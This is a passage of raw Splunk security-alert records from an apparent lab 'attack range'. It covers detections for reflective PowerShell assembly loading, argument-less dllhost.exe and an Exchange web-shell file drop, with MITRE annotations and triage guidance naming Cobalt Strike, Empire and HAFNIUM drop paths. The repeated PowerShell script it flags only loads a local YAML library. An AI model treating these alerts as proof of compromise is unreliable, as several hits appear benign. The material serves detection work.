Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664866532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664859600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664859600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="7044", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664859600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664859600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1b84", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664863760, search_name="ESCU - Detect Exchange Web Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\", \"T1190\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"file_name\", \"role\": [\"Victim\"], \"type\": \"File Name\"}]}", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", annotations.mitre_attack="T1190", dest="exchange01.attackrange.local", file_create_time="2022-10-04 05:06:18.690", file_name="iismetautcrq.aspx", file_path="C:\\inetpub\\wwwroot\\aspnet_client\\iismetautcrq.aspx", info_max_time="+Infinity", info_min_time="0.000", process_name="System", risk_message="A file - iismetautcrq.aspx was written to disk that is related to IIS exploitation previously performed by HAFNIUM. Review further file modifications on endpoint exchange01.attackrange.local by user $user$.", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="81.0", savedsearch_description="The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", threat_object="iismetautcrq.aspx", threat_object_type="file name" 1664862932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T04:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T04:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664862932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T04:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T04:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664862932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T04:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T04:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664862932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": 